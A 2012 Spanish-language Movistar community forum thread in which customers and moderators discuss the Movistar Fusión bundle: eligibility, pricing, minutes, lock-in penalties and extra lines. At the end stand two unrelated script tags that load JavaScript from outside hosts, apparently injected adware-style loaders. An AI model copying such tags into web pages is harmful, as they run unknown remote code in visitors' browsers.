Editado 21-09-2012 10:07
Editado 21-09-2012 10:07
Buenas tardes a tod@s
Los últimos días nos habéis hecho llegar una serie de preguntas sobre Movistar Fusión que esperamos poder resolver con las siguientes dudas frecuentes, no obstante estaremos encantados de resolver cualquier otra pregunta que pueda no estar contemplada en las mismas.
SERVICIO MOVISTAR FUSIÓN
LINEAS ADICIONALES
Podrás financiar los dispositivos con precio desde 60€ en cuotas mensuales con un plazo máximo de 24 meses.
Para facilitarte las cuentas, el importe de la cuota financiada del móvil se añadirá a la cuota mensual en la factura fijo de Movistar Fusión, para que en la misma se refleje el gasto completo en comunicaciones.
Al cabo de 12 meses quedaras libre de permanencia pudiendo permanecer con Movistar Fusión o darte de baja sin penalización.
Si por el contrario te das de baja de todo el paquete Movistar Fusión no superados los 12 meses de compromiso, la línea adicional será reposicionada al Contrato Básico Personal con un Habla y Navega 30 (o Con tu Negocio 24h + Internet 40 para autónomos) y se ejecutará la penalización de 190€.
FACTURACIÓN
No te pierdas las últimas ofertas en miMovistar, Tarifas Móvil, Fibra, Móviles, Televisión, Alarmas y Ofertas Movistar. Descubre los últimos estrenos de Movistar Plus+ en Ficción, Motor, Deportes y el mejor Fútbol. ¡Ser usuario registrado de Movistar.es tiene grandes ventajas y descuentos! Regístrate en Mi Cuenta, ¡es gratis!.
Te invitamos a seguirnos en X, Facebook, Telegram e Instagram.
¡Resuelto! Ir a solución.
Hola,
alguien sabe porque los clientes de Vdsl, no nos podremos acoger a Movistar Fusion? y si los clientes de adsl y fibra?
Gracias
Hola buenas noches, proximamente tendréis la tarifa de "Movistar Fusión" la cual se describo así a través de vuestro twitter:
***La tarifa para clientes que quieran ADSL a partir de 10 megabits de velocidad por segundo, con 500 minutos de llamadas a móvil y navegación móvil con descarga de un gigabit, tiene un precio de 49,9€***
Mis dudas son si este ADSL llevará la TPN a fijos, los 500mins de llamadas a móviles fines de semana y los 50 mins de fijo a móvil de lunes a viernes?
Los 500mins son para llamar de la línea fija a móviles o para llamar desde el móvil de contrato del cliente ó compartidos entre fijo y móvile/móviles?
La velocidad de subida y bajada seguirá siendo la misma en ADSL y en internet móvil del cliente?
Cuales serán los periodos de facturación? (Ya que en fijo y móvil son diferentes).
De qué manera regularéis los periodos de facturación entre fijo y móvil en el caso de que el cliente acepte esta modalidad?
A la espera de vuestra pronta respuesta.
Saludos.
Aquí tienes la resolución a la mayoria de dudas: http://comunidad.movistar.es/t5/Bienvenida-y-noticias/MOVISTAR-FUSI%C3%93N-la-oferta-integrada-de-co...
¿Este ADSL llevará la TPN a fijos, los 500mins de llamadas a móviles fines de semana y los 50 mins de fijo a móvil de lunes a viernes?
Pagina 6 del PDF: http://saladeprensa.telefonica.com/documentos/Rueda_de_Prensa_F_LMGvf_20120914.pdf
Los 500mins son para llamar de la línea fija a móviles o para llamar desde el móvil de contrato del cliente ó compartidos entre fijo y móvile/móviles?
Los 500 minutos son aparte de los que dispones desde el fijo, pero estos 500 se realizan desde el terminal móvil de contrato.
La velocidad de subida y bajada seguirá siendo la misma en ADSL y en internet móvil del cliente?
Se mantienen.
La respuesta a las dos ultimas preguntas las desconozco.
Cada cual tiene su plan de fijo y movil.
En mi caso, tengo contratada la fibra de 100 mg que actualmente la pago a precio de 50 mg y que en mi caso sube unos 64 euros ( iva incluido).
En relación a mi terminal móvil, tengo la tarifa 6 con internet movil de 500 mg y vengo gastando entre 30 y 40 € iva incluido.
Si sumamos ambos importes, hablamos de entre 94 o 104 ( vamos a poner de media unos 100 € iva incluido).
La apuesta que hace la opción movistar fusion que incluye el fijo con fibra 100 megas, los 500 minutos de fijo a movil los fines de semana y los 50 entre semana, e incorporar un terminal movil con 500 minutos a cualquier operador, 1 gB de datos y los SMS , asciende a 72,48 € ( iva incluido).
la diferencia es clara y en mi caso, es de 27,52 € menos que pagaré al mes ( iva incluido).El ahorro anual estimado es de 330 € ( iva incluido) y el descuento neto mensual sobre lo que pago sumando ambos importes y la nueva tarifa de movistar fusion fibra con un único terminal ,móvil es del 27,52 % ya que la base mensual que tengo son precisamente 100 € iva incluido)
Creo que es todo un acierto y apludo el gesto de movistar en fusionar los contratos de telefonía fija y móvil ya que supondrá ventajas de ahorro muy interesantes para todos.
En cuanto a la permanencia , parece ser que será de 12 meses de permanencia ( no me importa ya que siempre he sido cliente movistar tanto en telefonica fija como movil)
Además, en mi caso, ahorrándome 27,52 € , me beneficio de disponer de 500 minutos para hablar en mi terminal móvil, es decir, sobre mi consumo de minutos medio mensual (180 minutos), gano 320 minutos adicionales sin sobrecoste.
Haced números pero creo que es una oferta muy interesante para todos.
También felicito que Movistar piense en la incorporación de nuevos terminales que por 24,20 € iva incluido , puedes optar por tener un segundo terminal en las mismas condiciones del primero y porqué no, también la opción de disponer de condiciones ventajosas para adquirir nuevos terminales a pagar en 24 mese sin intereses.......
Espero vuestras valoraciones y me apunto a ir el mismo dia 1 de Odtubre a una tienda movistar para fusionar mis contratos con movistar.
saludos.
los 500 minutos de movil son durante las 24 horas del dia
Para mi situacion, el factor determinante de esta tarifa va a ser la permanencia, su coste en caso de baja.
He analizado mis consumos, y 7-10€ al mes de ahorro no me compesa el posible costo de una baja pagando la permanencia.
Es una tarifa interesante para grandes consumidores de movil y internet movil, este no es mi caso.
Buenos días a tod@s
Aquellos que nos estáis preguntando por la oferta de Movistar Fusión para VDSL 30MB, comentaros que de momento la oferta no esta definida al 100%, esperamos poder daros mas detalles en breve.
Un saludo
No te pierdas las últimas ofertas en miMovistar, Tarifas Móvil, Fibra, Móviles, Televisión, Alarmas y Ofertas Movistar. Descubre los últimos estrenos de Movistar Plus+ en Ficción, Motor, Deportes y el mejor Fútbol. ¡Ser usuario registrado de Movistar.es tiene grandes ventajas y descuentos! Regístrate en Mi Cuenta, ¡es gratis!.
espero que para los que tengamos vdsl tambien porque yo demas tengo 2 lineas moviles y me ahorraria mucho..espero noticias
La nueva oferta de Movistar Fusion, que incluye fijo-adsl y movil con 1gb de internet, en el caso de que no se disponga de una smartphone par disfrutar de esta oferta ¿ofrecera algún terminal?
yo creo que... va a ser que no
JOPELAS! espero que sí ofrezcan algo. Hoy he ido a una tienda pero no dan aún información
En el PDF de la presentación pone claramente que se subvencionan. Tendrás que darte de alta en Movistar Móvil, con Movistar Fusión y pagar como cualquiera el terminal a plazos.
Y para los que tenemos vdsl 10 megas?
Es mas, es que aqui no ponen adsl normal....
Hol@FRAN5282 ,
Indicarte que en la nota de prensa presentada sobre el producto se informa sobre: " También Movistar Fusión llevará asociado un nuevo plan para la renovación de terminales, exclusivo para los clientes que lo contraten, con un catálogo de dispositivos Premium para ellos y a unos precios ventajosos y con opciones de pago con cuotas sin intereses." Puedes leer la nota de prensa en este enlace de la Comunidad.
Salu2
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
He leido la noticia de movistar fusion y aprovechando que han instalado la fibra en el edifico y estoy interesado, paso a explicar mi caso
Actualmente tengo la linea y la adsl 30 megas con jazztel, movistar me sigue cobrando algo asi como mantenimiento de telefono.
La linea fija de casa esta a mombre de mi mujer y tengo un movil con tarifa de datos en movistar a mi nombre.
Puedo aprovechar la oferta de fusion fibra ,aunque los titulares de las lineas sean distintos, el domicilio de facturacion y la cuenta bancaria son los mismos en ambos casos.
Deberia hacer una portabilidad desde jazztel a movistar , me quedaria sin linea y sin adsl mucho tiempo ya que en casa internet es un servicio basico
Y para los que tenemos vdsl 10 megas?
Es mas, es que aquí no ponen adsl normal....
Hola Franxu y bienvenido a la Comunidad
Esperamos poder dar mas detallas en breve al respecto de tu duda pero nuestra intención es no olvidarnos de nadie.
Un saludo
Una consulta, emilio
los clientes que actualmente tenemos algun descuento promocional en el ADSL, podemos pasar a movistar fusion manteniendo el descuento o tenemos que esperar a que finalice
Hola.
He leido la nota de prensa que ha publicado Movistar sobre su nueva oferta combinada de servicios y estoy gratamente sorprendido de hacia dónde quiere ir esta compañía. Sólo espero en que no se quede todo en buenas intenciones.
Volviendo al tema inicial quería saber si hay alguna pista de cómo quedaría la cosa si, como es mi caso, tienes hasta cuatro líneas de móvil, además del adsl y el fijo.
Gracias por adelantado.
Saludos.
Por lo que yo tengo entendido, seria 49,90€ (más IVA) con una línea móvil, y luego por cada línea que añades (hasta un máximo de cuatro) 20 € (más IVA) por cada línea que añades!
Un saludo!
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>